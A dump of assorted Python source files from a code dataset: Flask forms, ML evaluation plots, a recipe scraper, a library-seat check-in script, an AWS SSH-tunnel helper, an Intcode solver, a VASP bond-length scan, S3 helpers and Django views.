selection\n if method == 1:\n main_insert(n=n)\n elif method == 2:\n main_query()\n elif method == 3:\n main_delete()\n else:\n print('Undefined method!')\n\n main()\n","sub_path":"rdbsm.py","file_name":"rdbsm.py","file_ext":"py","file_size_in_byte":3336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"145208476","text":"#!/usr/bin/env python\n# _*_ coding: utf-8 _*_\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, PasswordField, SubmitField, FileField, TextAreaField\nfrom wtforms.validators import DataRequired, Email, Regexp, EqualTo, ValidationError, Length\nfrom app.models import User\n\n\n# 注册\nclass RegistForm(FlaskForm):\n name = StringField(\n label=\"账号\",\n validators=[\n DataRequired(\"账号不能为空!\")\n ],\n description=\"账号\",\n render_kw={\n \"class\": \"form-control input-lg\",\n \"placeholder\": \"请输入登录名!\",\n }\n )\n pwd = PasswordField(\n label=\"密码\",\n validators=[\n DataRequired(\"密码不能为空!\")\n ],\n description=\"密码\",\n render_kw={\n \"class\": \"form-control input-lg\",\n \"placeholder\": \"请输入密码!\",\n }\n )\n repwd = PasswordField(\n label=\"确认密码\",\n validators=[\n DataRequired(\"请输入确认密码!\"),\n EqualTo('pwd', message=\"两次密码不一致!\")\n ],\n description=\"确认密码\",\n render_kw={\n \"class\": \"form-control input-lg\",\n \"placeholder\": \"请输入确认密码!\",\n }\n )\n submit = SubmitField(\n '注册',\n render_kw={\n \"class\": \"btn btn-lg btn-success btn-block\",\n }\n )\n\n @staticmethod\n def validate_name(field):\n name = field.data\n user = User.query.filter_by(name=name).count()\n if user == 1:\n raise ValidationError(\"账号已经存在!\")\n\n\nclass LoginForm(FlaskForm):\n name = StringField(\n label=\"账号\",\n validators=[\n DataRequired(\"账号不能为空!\")\n ],\n description=\"账号\",\n render_kw={\n \"class\": \"form-control input-lg\",\n \"placeholder\": \"请输入账号!\",\n }\n )\n pwd = PasswordField(\n label=\"密码\",\n validators=[\n DataRequired(\"密码不能为空!\")\n ],\n description=\"密码\",\n render_kw={\n \"class\": \"form-control input-lg\",\n \"placeholder\": \"请输入密码!\",\n }\n )\n submit = SubmitField(\n '登录',\n render_kw={\n \"class\": \"btn btn-lg btn-primary btn-block\",\n }\n )\n\n def validate_account(self, field):\n account = field.data\n admin = User.query.filter_by(name=account).count()\n if admin == 0:\n raise ValidationError(\"账号不存在! \")\n\n\nclass UserdetailForm(FlaskForm):\n name = StringField(\n label=\"账号\",\n validators=[\n DataRequired(\"账号不能为空!\")\n ],\n description=\"账号\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入账号!\",\n }\n )\n face = FileField(\n label=\"头像\",\n validators=[\n DataRequired(\"请上传头像!\")\n ],\n description=\"头像\",\n )\n submit = SubmitField(\n '保存修改',\n render_kw={\n \"class\": \"btn btn-success\",\n }\n )\n\n\nclass PwdForm(FlaskForm):\n old_pwd = PasswordField(\n label=\"旧密码\",\n validators=[\n DataRequired(\"旧密码不能为空!\")\n ],\n description=\"旧密码\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入旧密码!\",\n }\n )\n new_pwd = PasswordField(\n label=\"新密码\",\n validators=[\n DataRequired(\"新密码不能为空!\"),\n ],\n description=\"新密码\",\n render_kw={\n \"class\": \"form-control\",\n \"placeholder\": \"请输入新密码!\",\n }\n )\n submit = SubmitField(\n '修改密码',\n render_kw={\n \"class\": \"btn btn-success\",\n }\n )\n","sub_path":"app/home/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"625034888","text":"import os\nimport sys\n\nfrom sklearn import metrics\n\nsys.path.append('..')\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\nfrom Evals import *\nfrom util.classification_utils import get_optimal_threshold, get_prediction\nimport seaborn as sns\nfrom sklearn.metrics import roc_curve, auc, precision_recall_curve, average_precision_score\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.ensemble import RandomForestClassifier\nfrom scipy import interp\n\nimport pandas as pd\nimport numpy as np\n\ndef bar_plot_svc(scores_tr,scores_ev,gammas,thresholds = None):\n bar_width = 0.35\n plt.xticks(np.arange(0,20)+bar_width/2,range(0,20))\n bar1 = plt.bar(gammas,scores_tr,bar_width,label='Train',alpha=.5,color='b')\n bar2 = plt.bar(gammas+bar_width,scores_ev,bar_width,label='Ev',alpha=.5,color='r')\n plt.hlines(.5,0,max(gammas)+1,linestyle='dashed',alpha=.2)\n #plt.plot(np.arange(0,15),[.5]*15,'--',color='k')\n plt.xlabel('Dim')\n plt.ylabel('F1 Score')\n plt.xlim(0,max(gammas)+1)\n plt.ylim(0,1)\n plt.legend()\n\n # Add thresholds above the two bar graphs\n if thresholds:\n for idx,rects in enumerate(zip(bar1,bar2)):\n higher=np.argmax([rects[0].get_height(),rects[1].get_height()])\n rect=rects[higher]\n height = rect.get_height()\n plt.text(rect.get_x() + rect.get_width()-(higher/2.), height, '%.2f' % thresholds[idx], ha='center', va='bottom') \n plt.show()\n\ndef plot_svc(scores_tr,scores_ev,hyper,label='Hyperpara'):\n plt.scatter(hyper,scores_tr,label='Train')\n plt.scatter(hyper,scores_ev, label='Ev')\n plt.legend()\n plt.title('F1 Score')\n plt.xlabel(label)\n plt.ylabel('F1 - Score')\n plt.ylim(0,1)\n plt.show()\n\n# def conf_mat(pred,true, title):\n# tp,fp,fn,tn = get_pos_and_negs(pred,true)\n# rates = np.array([tp,fp,fn,tn]).reshape((2,2))\n# df_cm = pd.DataFrame(rates, index = ['Pred Happy','Pred Not Happy'],columns = ['True Happy','True Not Happy'])\n# plt.figure(figsize = (10,7))\n# sn.heatmap(df_cm, annot=True,fmt='g',annot_kws={\"size\": 26})\n# plt.title(title)\n# plt.savefig(os.path.join('/home/emil/EmoCog/data/new_labels/images',title+'.png'))\n# plt.show()\n\ndef conf_mat(pred, true, title):\n tn,fp,fn,tp = metrics.confusion_matrix(true, pred).ravel()\n rates = np.array([tp,fp,fn,tn]).reshape((2,2))\n df_cm = pd.DataFrame(rates, index = ['Pred Happy','Pred Not Happy'],columns = ['True Happy','True Not Happy'])\n plt.figure(figsize = (10,7))\n sns.heatmap(df_cm, annot=True,fmt='g',annot_kws={\"size\": 26})\n plt.title(title)\n plt.savefig(os.path.join('/home/emil/EmoCog/data/new_labels/images',title+'.png'))\n plt.show()\n plt.close()\n\n\ndef score_heatmap(pred, true, title):\n met_dict = metrics.classification_report(true, pred, output_dict=True)\n df = pd.DataFrame(met_dict)\n del df['weighted avg']\n acc = df['accuracy'].values\n del df['accuracy']\n df.loc[len(df)] = [np.nan]*2+[acc[0]]\n df.rename(columns={'macro avg':'Total', 0.0:'Not happy', 1.0:'Happy'}, index={4:'accuracy'},inplace=True)\n plt.figure(figsize = (10,7))\n sns.heatmap((df.T).round(2),annot=True,cmap='Reds', fmt='g', vmin = 0,vmax=1, annot_kws={\"size\": 22})\n plt.yticks(rotation=0, fontsize=\"10\", va=\"center\")\n plt.title(title)\n plt.savefig(os.path.join('/home/emil/EmoCog/data/new_labels/images',title+'.png'))\n plt.show()\n plt.close()\n\n\ndef plot_roc(x,y,classifier, title): #the classifier has to be pretrained here!!\n cv = StratifiedKFold(n_splits=10, shuffle=False)\n tprs = []\n aucs = []\n fpr_interval = np.linspace(0, 1, 100)\n i = 0\n for train, test in cv.split(x, y):\n probas_ = classifier.predict_proba(x[test])\n # Compute ROC curve and area the curve\n #this returns different tpr/fpr for different decision thresholds\n fpr, tpr, thresholds = roc_curve(y[test], probas_[:, 1])\n curr_interp = interp(fpr_interval, fpr, tpr)\n tprs.append(curr_interp)\n tprs[-1][0] = 0.0\n roc_auc = auc(fpr, tpr)\n aucs.append(roc_auc)\n i += 1\n\n plt.plot([0, 1], [0, 1], linestyle='--', lw=2, color='r',\n label='Chance', alpha=.8)\n\n mean_interpol_tpr = np.mean(tprs, axis=0)\n mean_interpol_auc = auc(fpr_interval, mean_interpol_tpr)\n std_auc = np.std(aucs)\n plt.plot(fpr_interval, mean_interpol_tpr, color='b',\n label=r'Mean ROC (AUC = %0.2f $\\pm$ %0.2f)' % (mean_interpol_auc, std_auc),\n lw=2, alpha=.8)\n\n std_tpr = np.std(tprs, axis=0)\n tprs_upper = np.minimum(mean_interpol_tpr + std_tpr, 1)\n tprs_lower = np.maximum(mean_interpol_tpr - std_tpr, 0)\n plt.fill_between(fpr_interval, tprs_lower, tprs_upper, color='grey', alpha=.2,\n label=r'$\\pm$ 1 std. dev.')\n\n plt.xlim([-0.05, 1.05])\n plt.ylim([-0.05, 1.05])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title(title)\n plt.legend(loc=\"lower right\")\n plt.savefig(os.path.join('/home/emil/EmoCog/data/new_labels/images',title+'.png'))\n plt.show()\n plt.close()\n\n\ndef plot_pr_curve(x, y, classifier, title):\n y_probs = classifier.predict_proba(x)\n avg_p = average_precision_score(y,y_probs[:,1]) #get the average precision score\n precision, recall, _ = precision_recall_curve(y, y_probs[:,1])\n #step_kwargs = ({'step': 'post'}\n # if 'step' in signature(plt.fill_between).parameters\n # else {})\n step_kwargs = ({'step': 'post'})\n plt.step(recall, precision, color='b', alpha=0.2,\n where='post')\n plt.fill_between(recall, precision, alpha=0.2, color='b', **step_kwargs)\n\n plt.xlabel('Recall')\n plt.ylabel('Precision')\n plt.ylim([0.0, 1.05])\n plt.xlim([0.0, 1.0])\n plt.title(title + ', AP={0:0.2f}'.format(\n avg_p))\n plt.savefig(os.path.join('/home/emil/EmoCog/data/new_labels/images',title+'.png'))\n plt.show()\n plt.close()\n\n\n# def _background_gradient(s, m, M, cmap='PuBu', low=0, high=0):\n# rng = M - m\n# norm = colors.Normalize(m - (rng * low),\n# M + (rng * high))\n# normed = norm(s.values)\n# c = [colors.rgb2hex(x) for x in plt.cm.get_cmap(cmap)(normed)]\n# return ['background-color: %s' % color for color in c]\n#\n#\n#\n# def print_results(df_res):\n# pretty = df_res.style.apply(_background_gradient,\n# cmap='PuBu',\n# m=df_res.min().min(),\n# M=df_res.max().max(),\n# low=0,\n# high=1)\n# print(pretty)\n#\n \n \n\"\"\"\nFunction to plot an average ROC curve, given many random trials of shuffled labels.\nCurrentlz onlz works with Random Forest.\nInput: pandas df, where each row contains the best hyperparas, the PR result and the shuffled y, y_ev. x, x_ev\n\"\"\"\n\n\ndef plot_roc_random(df, title, train = True): \n tprs = []\n aucs = []\n fpr_interval = np.linspace(0, 1, 100)\n i = 0\n for idx, row in df.iterrows():\n classifier = RandomForestClassifier(n_estimators=int(row['Number Estimators']), max_depth=int(row['Max Depth']), max_features=int(row['Max Features']), random_state=0)\n y = row['y']\n y_ev = row['y_ev']\n x = row['x']\n x_ev = row['x_ev']\n classifier.fit(x,y)\n if train:\n probas_ = classifier.predict_proba(x)\n # Compute ROC curve and area the curve\n #this returns different tpr/fpr for different decision thresholds\n fpr, tpr, thresholds = roc_curve(y, probas_[:, 1])\n else:\n probas_ = classifier.predict_proba(x_ev)\n # Compute ROC curve and area the curve\n #this returns different tpr/fpr for different decision thresholds\n fpr, tpr, thresholds = roc_curve(y_ev, probas_[:, 1])\n curr_interp = interp(fpr_interval, fpr, tpr)\n tprs.append(curr_interp)\n tprs[-1][0] = 0.0\n roc_auc = auc(fpr, tpr)\n aucs.append(roc_auc)\n i += 1\n\n\n plt.plot([0, 1], [0, 1], linestyle='--', lw=2, color='r',\n label='Chance', alpha=.8)\n\n\n mean_interpol_tpr = np.mean(tprs, axis=0)\n mean_interpol_auc = auc(fpr_interval, mean_interpol_tpr)\n std_auc = np.std(aucs)\n plt.plot(fpr_interval, mean_interpol_tpr, color='b',\n label=r'Mean ROC (AUC = %0.2f $\\pm$ %0.2f)' % (mean_interpol_auc, std_auc),\n lw=2, alpha=.8)\n\n std_tpr = np.std(tprs, axis=0)\n tprs_upper = np.minimum(mean_interpol_tpr + std_tpr, 1)\n tprs_lower = np.maximum(mean_interpol_tpr - std_tpr, 0)\n plt.fill_between(fpr_interval, tprs_lower, tprs_upper, color='grey', alpha=.2,\n label=r'$\\pm$ 1 std. dev.')\n\n plt.xlim([-0.05, 1.05])\n plt.ylim([-0.05, 1.05])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title(title)\n plt.legend(loc=\"lower right\")\n plt.show()\n\n\ndef conf_mat_random(df, train):\n count = 0\n res = np.zeros(4)\n pr = 0\n rec = 0\n f1 = 0\n for idx, row in df.iterrows():\n classifier = RandomForestClassifier(n_estimators=int(row['Number Estimators']), max_depth=int(row['Max Depth']), max_features=int(row['Max Features']), random_state=0)\n y = row['y']\n y_ev = row['y_ev'] \n x = row['x']\n x_ev = row['x_ev']\n classifier.fit(x,y)\n best_thr = get_optimal_threshold(classifier, x, y, go_after_pr=True) # get threshold using cv (on whole dataset)\n y_pred = get_prediction(classifier, x, best_thr) # using that threshold, get predictions and f1 score\n y_pred_ev = get_prediction(classifier, x_ev, best_thr) # using that threshold, get predictions and f1 score\n \n if train:\n res += np.array(get_pos_and_negs(y_pred,y))\n p,r = get_precision_recall(y_pred,y)\n f = get_f1(y_pred,y)\n f1 += f\n pr += p\n rec += r\n else:\n res += np.array(get_pos_and_negs(y_pred_ev,y_ev))\n p,r = get_precision_recall(y_pred_ev,y_ev)\n f = get_f1(y_pred_ev,y_ev)\n f1 += f\n pr += p\n rec += r\n count += 1\n if train:\n print('Train')\n else:\n print('Eval')\n print('Avg. Precision {0:.3f}, Avg. Recall {1:.3f}, Avg. F1 {2:.3f}'.format(pr/count,rec/count,f1/count))\n df_cm = pd.DataFrame(res.reshape(2,2)/count, index = ['Pred Happy','Pred Not Happy'],columns = ['True Happy','True Not Happy'])\n plt.figure(figsize = (10,7))\n sn.heatmap(df_cm, annot=True,fmt='g',annot_kws={\"size\": 26})\n plt.show()\n return pr/count,rec/count,f1/count\n\n \n \ndef happy_ratio_random(df):\n new_df = pd.DataFrame(columns = ['Happy', 'Train', 'Test'])\n\n for idx, row in df.iterrows():\n new_df.loc[2*idx] = [True,np.sum(row['y']),np.sum(row['y_ev'])]\n new_df.loc[2*idx+1] = [False,len(row['y'])-np.sum(row['y']),len(row['y_ev'])-np.sum(row['y_ev'])]\n\n llel = new_df.melt(id_vars = 'Happy',value_vars = ['Train','Test'])\n\n llel['value'] = llel['value'].astype('int')\n llel['Happy'] = llel['Happy'].astype('bool')\n\n sns.set()\n\n sns.violinplot(x='variable',data=llel,y='value',hue='Happy',split=True, hue_order =[True,False], palette = {True:'blue', False:'red'} )\n plt.title('Violin Plot of Happy/Not Happy distribution')\n plt.ylabel('Counts')\n plt.xlabel('Datset')\n plt.show()\n","sub_path":"vis/classification_vis.py","file_name":"classification_vis.py","file_ext":"py","file_size_in_byte":11417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"54608973","text":"from BeautifulSoup import BeautifulSoup\nimport re\nfrom RecipeParser import RecipeParser\n\nclass FoodNetworkParser(RecipeParser):\n def __init__(self, pagedata):\n self._ingredients = []\n self._directions = []\n self._title = \"\"\n self._author = \"\"\n soup = BeautifulSoup(pagedata)\n self._title = soup('h1', { 'class' : \"fn\" })[0].string\n self._author = soup('p', { 'class' : 'author'})[0].a.string\n lists = soup('ul', { 'class' : re.compile('kv-ingred-list[0-9]') })\n for ul in lists:\n items = ul.fetch('li')\n tmp = []\n for li in items:\n tmp.append(li.string)\n self._ingredients.append(tmp)\n values = soup('div', { 'class' : 'instructions' })\n for val in values:\n paras = val.fetch('p')\n tmp = []\n for para in paras:\n tmp.append(para.string)\n self._directions.append(tmp)\n# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4\n","sub_path":"FoodNetworkParser.py","file_name":"FoodNetworkParser.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"52927741","text":"import requests\nimport time\nimport json\nimport sys\nimport threading\nLogIn_URL = \"http://seat1.lib.hlju.edu.cn/libseat-ibeacon/wechatIndex?type=index&\"\nGuard_URL = \"http://seat1.lib.hlju.edu.cn/libseat-ibeacon/getUserBookHistory\"\nCheck_URL = \"http://seat1.lib.hlju.edu.cn/libseat-ibeacon/checkIn?bookId=\"\ndef guard(stu):\n session = requests.session()\n session.get(LogIn_URL + stu['url'])\n resp = session.get(Guard_URL)\n res_json = resp.json()\n if res_json[\"params\"][\"history\"][0][\"stat\"] == \"RESERVE\":\n temp = session.get(Check_URL)\n print(stu[\"nickname\"],temp.json()[\"content\"])\n\n\nif __name__ == '__main__':\n filename = \"new.json\"\n start = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(time.time()))\n print(' '+start)\n f = open(sys.path[0] + '/' + filename, 'r', encoding='utf8')\n info = json.load(f)\n for i in info['stu']:\n task = threading.Thread(target=guard, args=(i,))\n task.start()\n","sub_path":"Punch.py","file_name":"Punch.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"115821592","text":"#!/usr/bin/env python\n# -*- encoding: utf-8\n\"\"\"\nConnect to the first instance in an autoscaling group.\n\nUsage: create_tunnel_to_asg.py [--key=] [--port=] [--type=(p2 | t2)] [--namespace=]\n\nActions:\n --key= Path to an SSH key with access to the instances in the ASG.\n --port= Local port to use for the remote Jupyter notebook\n (default: 8888).\n --type=(p2 | t2) AWS Instance type (valid values: p2,t2) defaults to t2\n\n\"\"\"\n\nimport os\nimport subprocess\nimport sys\nimport time\n\nfrom os.path import expanduser\n\nimport boto3\nimport docopt\n\nfrom asg_utils import discover_asg\n\n\ndef _default_ssh_key_path():\n return \"%s/.ssh/wellcomedigitalplatform\" % expanduser(\"~\")\n\n\ndef _wait(message, wait=5):\n print(\"%s; waiting for %d seconds...\" % (message, wait))\n time.sleep(wait)\n\n\ndef main():\n args = docopt.docopt(__doc__)\n\n key_path = args[\"--key\"] or _default_ssh_key_path()\n namespace = args[\"--namespace\"] or \"notebook\"\n\n print(\"Using SSH key at path %r\" % key_path)\n\n assert os.path.exists(key_path)\n\n port = args[\"--port\"] or \"8888\"\n\n instance_type = args[\"--type\"] or \"t2\"\n tag_name = \"jupyter-%s-%s\" % (instance_type, namespace)\n\n asg_client = boto3.client(\"autoscaling\")\n\n while True:\n asg_data = discover_asg(asg_client=asg_client, tag_name=tag_name)\n\n if not asg_data[\"Instances\"]:\n _wait(\"No instances in ASG group %r\" % asg_data[\"AutoScalingGroupName\"])\n continue\n\n in_service_instances = [\n inst\n for inst in asg_data[\"Instances\"]\n if inst[\"LifecycleState\"] == \"InService\"\n ]\n\n if not in_service_instances:\n _wait(\n 'No instances in ASG group %r are \"InService\"'\n % asg_data[\"AutoScalingGroupName\"]\n )\n continue\n\n assert len(in_service_instances) > 0\n break\n\n instance_data = in_service_instances[0]\n instance_id = instance_data[\"InstanceId\"]\n\n print(\"Looking up EC2 instance ID %r\" % instance_id)\n\n ec2_client = boto3.client(\"ec2\")\n resp = ec2_client.describe_instances(InstanceIds=[instance_id])\n\n try:\n instances = resp[\"Reservations\"][0][\"Instances\"]\n ec2_data = instances[0]\n assert ec2_data[\"InstanceId\"] == instance_id\n\n public_dns = ec2_data[\"PublicDnsName\"]\n except (IndexError, KeyError) as err:\n print(\"Unexpected error parsing the EC2 response: %r\" % err)\n sys.exit(\"resp=%r\" % resp)\n\n print(\"Connecting to instance %r\" % public_dns)\n\n try:\n subprocess.check_call(\n [\n \"ssh\",\n # Use the provided SSH key to connect.\n \"-i\",\n key_path,\n # Create a tunnel to port 8888 (Jupyter) on the remote host\n \"-L\",\n \"%s:%s:8888\" % (port, public_dns),\n # Our data science AMI is based on Ubuntu\n \"ubuntu@%s\" % public_dns,\n ]\n )\n except subprocess.CalledProcessError as err:\n sys.exit(err.returncode)\n\n\nif __name__ == \"__main__\":\n try:\n main()\n except KeyboardInterrupt:\n sys.exit(1)\n","sub_path":"data_science/scripts/create_tunnel_to_asg.py","file_name":"create_tunnel_to_asg.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"396590227","text":"import csv\nimport pandas as pd\n\nfile_seq= \"/home/anjali/06/datasets/sequence.csv\"\nfile_features= \"/home/anjali/06/datasets/features.csv\"\n\n# fh_seq= open(file,seq, \"r\")\n\nseq_info= pd.read_csv(file_seq)\nfeatures_info= pd.read_csv(file_features)\n\n\nnum = [[seq,db] for [seq,db] in zip(seq_info.sequence,seq_info.Database) if db==\"APD3\"]\nprint(len(num))\n\ns=list()\nfor item in num:\n s.append(num[0])\n\ndf= seq_info\ndf2= features_info\ndf_apd3=dict()\ndf_apd3.update(df)\ndf_apd3.update(df2)\n\n# df_apd3.append(f for f in features_info.sequence if f in s)\n#\n# for f in features_info.sequence:\n# if(f in s):\n# print(f)\n\nf=list()\nf=features_info.sequence\n# print(len(features_info.sequence))\n\nprint(len(f))\n\nfor item in f:\n for seq in s:\n if(item==seq):\n d=d.update\n\n\n# # if(seq_info.Database==\"APD3\"):\n# # df=dict()\n# # df[\"sequence\"]=seq_info.sequence\n#\n# # d=dict()\n# # d[\"sequence\"][\"Database\"]= [[seq,db] for [seq,db] in zip(seq_info.sequence,seq_info.Database) if db==\"APD3\"]\n#\n#\n# # for f,s in zip(features_info.sequence, num):\n# # # print(f)\n# # # print(s[1])\n# # if(f==s[0]):\n# # print(f)\n# # df_apd3.update({\"sequence\": \"f\"})\n#\n# # print(len(df_apd3[\"sequence\"]))\n# seq= list()\n# for item in num:\n# seq.append(item[0])\n#\n# print(seq[0])\n#\n# d=dict()\n# d2=dict()\n# for f in features_info.sequence:\n# if(f in seq):\n# d[\"sequence\"]= f\n# d2.append(d)\n","sub_path":"addfeatures.py","file_name":"addfeatures.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"627502133","text":"#!/usr/bin/env python3\nimport sys\n\nclass Amplifier:\n '''\n Amplifier described in the problem. Each amplifier program runs \n on the existing Intcode computer.\n\n Attributes:\n phase: Integer indicating the phase setting for the amplifier.\n input_: Integer input to the amplifier.\n memory: List of integers for the Intcode program/memory.\n output: Integer output of the amplifier.\n postion: Integer position in the memory of the last executed instruction.\n finished: Boolean value indicating whether the program has halted or not.\n first_input: Boolean to keep track of the whether the current input value\n is phase setting or actual input instruction.\n '''\n\n def __init__(self, phase, input_, memory):\n self.phase = phase\n self.input_ = input_\n self.memory = memory\n self.output = None\n self.position = 0\n self.halted = False\n self.first_input = True\n\n def set_input(self, input_):\n '''Set the value of the input to the amplifier with the given input value.'''\n\n self.input_ = input_\n\n def is_finished(self):\n '''Return True if the Amplifier has finished execution.'''\n\n return self.halted\n\n def intcode(self):\n '''Run the instructions in the memory on the Intcode computer.'''\n \n if self.is_finished():\n return self.output\n\n i = self.position\n\n while i < len(self.memory) and not self.is_finished():\n # intstruction in the form ABCDE\n if self.memory[i] >= 0:\n s = str(abs(self.memory[i])).zfill(5)\n \n opcode = int(s[-2:]) # DE\n c = int(s[-3]) # C\n b = int(s[-4]) # B\n a = int(s[-5]) # A\n\n if opcode == 1:\n x = self.memory[i+1] if c == 1 else self.memory[self.memory[i+1]]\n y = self.memory[i+2] if b == 1 else self.memory[self.memory[i+2]]\n z = self.memory[i+3]\n self.memory[z] = x + y\n i += 4\n\n if opcode == 2:\n x = self.memory[i+1] if c == 1 else self.memory[self.memory[i+1]]\n y = self.memory[i+2] if b == 1 else self.memory[self.memory[i+2]]\n z = self.memory[i+3]\n \n z = self.memory[i+3]\n self.memory[z] = x * y\n i += 4\n\n if opcode == 3:\n if self.first_input: \n self.memory[self.memory[i+1]] = self.phase\n self.first_input = False\n else:\n self.memory[self.memory[i+1]] = self.input_\n i += 2\n\n if opcode == 4:\n self.output = self.memory[i+1] if c == 1 else self.memory[self.memory[i+1]]\n i += 2\n break # pause execution here, move to next amplifier in the series\n \n if opcode == 5:\n x = self.memory[i+1] if c == 1 else self.memory[self.memory[i+1]]\n y = self.memory[i+2] if b == 1 else self.memory[self.memory[i+2]]\n i = y if x != 0 else i+3\n \n if opcode == 6:\n x = self.memory[i+1] if c == 1 else self.memory[self.memory[i+1]]\n y = self.memory[i+2] if b == 1 else self.memory[self.memory[i+2]]\n i = y if x == 0 else i+3\n \n if opcode == 7:\n x = self.memory[i+1] if c == 1 else self.memory[self.memory[i+1]]\n y = self.memory[i+2] if b == 1 else self.memory[self.memory[i+2]]\n z = self.memory[i+3]\n self.memory[z] = 1 if x < y else 0\n i += 4\n \n if opcode == 8:\n x = self.memory[i+1] if c == 1 else self.memory[self.memory[i+1]]\n y = self.memory[i+2] if b == 1 else self.memory[self.memory[i+2]]\n z = self.memory[i+3]\n self.memory[z] = 1 if x == y else 0\n i += 4\n\n if opcode == 99:\n self.halted = True\n break\n \n self.position = i\n\n return self.output\n\n\ndef done(amplifiers):\n for a in amplifiers:\n if not a.is_finished():\n return False\n\n return True\n\ndef generate_phase_permutation(items, permutation, chosen):\n '''Generate all permutations of phase settings.'''\n\n global program, max_thruster, max_phase\n\n if len(permutation) == len(items):\n\n amplifiers = []\n output = 0\n\n # Try a permutation of the phase settings.\n for i in range(len(permutation)):\n amplifiers.append(Amplifier(permutation[i], 0, program.copy()))\n\n i = 0\n while not all(map(lambda amp: amp.is_finished(), amplifiers)):\n amplifiers[i].set_input(output)\n output = amplifiers[i].intcode()\n \n # feedback loop\n i = (i+1) % len(amplifiers)\n\n if max_thruster < output:\n max_thruster = output\n max_phase = permutation.copy()\n\n return\n\n for i in range(len(items)):\n if not chosen[i]:\n chosen[i] = True\n permutation.append(items[i])\n generate_phase_permutation(items, permutation, chosen)\n permutation.pop()\n chosen[i] = False\n\n\nfor line in sys.stdin:\n program = line\n\nprogram = list(map(int, program.split(',')))\n\ninput_ = 0\nmax_thruster = 0\nphases = list(range(5, 10))\nmax_phase = []\n\ngenerate_phase_permutation(phases, [], [False] * len(phases))\n\nprint(max_thruster, max_phase)\n","sub_path":"2019/day07/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":5704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"524799206","text":"#!/usr/bin/env python\nfrom jasp import *\nfrom ase import Atom, Atoms\nbond_lengths = [1.11, 1.12, 1.125, 1.13, 1.135, 1.14, 1.15]\nenergies = []\nfor d in bond_lengths: # possible bond lengths\n co = Atoms([Atom('C', [0, 0, 0]),\n Atom('O', [d, 0, 0])],\n cell=(6, 6, 6))\n with jasp('molecules/co-{0}'.format(d), # output dir\n xc='PBE',\n nbands=6,\n encut=450,\n ismear=1,\n sigma=0.01,\n atoms=co) as calc:\n try:\n e = co.get_potential_energy()\n energies.append(e)\n print('d = {0:1.2f} ang'.format(d))\n print('energy = {0:1.3f} eV'.format(e))\n print('forces = (eV/ang)\\n {0}'.format(co.get_forces()))\n print('') # blank line\n except (VaspSubmitted, VaspQueued):\n energies.append(None)\n pass\nif None not in energies:\n import matplotlib.pyplot as plt\n plt.plot(bond_lengths, energies, 'bo-')\n plt.xlabel(r'Bond length ($\\AA$)')\n plt.ylabel('Total energy (eV)')\n plt.savefig('images/co-bondlengths.png')","sub_path":"smol-4.py","file_name":"smol-4.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"152504410","text":"import boto3\n\ndef upload_file(file_name, bucket):\n \"\"\"\n Function to upload a file to an S3 bucket\n \"\"\"\n\n object_name = \"\".join(file_name.split())\n s3_client = boto3.client('s3')\n response = s3_client.upload_file(file_name, bucket, object_name)\n return response\n\ndef download_file(file_name, bucket):\n \"\"\"\n Function to download a given file from an S3 bucket\n \"\"\"\n s3 = boto3.resource('s3')\n output = f\"downloads/{file_name}\"\n s3.Bucket(bucket).download_file(file_name, output)\n\n return output\n\ndef list_files(bucket):\n \"\"\"\n Function to list files in a given S3 bucket\n \"\"\"\n s3 = boto3.client('s3')\n contents = []\n for item in s3.list_objects(Bucket=bucket)['Contents']:\n contents.append(item)\n\n return contents \n \ndef get_bucket_location(file_name, bucket):\n\n s3 = boto3.resource('s3') \n # location = s3.get_bucket_location(Bucket=bucket)['LocationConstraint']\n url = 'https://%s.s3-us-west-1.amazonaws.com/uploads/%s' % (bucket, file_name)\n\n return url ","sub_path":"audiology/posts/audio.py","file_name":"audio.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"529408170","text":"from django.views.generic.list_detail import object_list, object_detail\nfrom django.shortcuts import render_to_response\n\n\nfrom services.models import Company\nfrom services.forms import CompanyForm\n\n\ndef company_list(request):\n queryset = Company.objects.all()\n kwargs = {\n \"template_object_name\": \"company\",\n \"template_name\": \"services/company_list.html\",\n \"extra_context\": {}, \n }\n return object_list(request, queryset, **kwargs)\n\ndef company_detail(request, slug):\n queryset = Company.objects.all()\n kwargs = {\n \"template_object_name\": \"company\",\n \"template_name\": \"services/company_detail.html\",\n \"extra_context\": {},\n }\n return object_detail(request, queryset, **kwargs)\n\n\ndef company_create(request, template=\"services/company_create.html\"):\n form = CompanyForm(request.POST or None)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(form.next())\n \n ctx = {\n \"form\": form\n }\n \n return render_to_response(template, ctx)\n \n 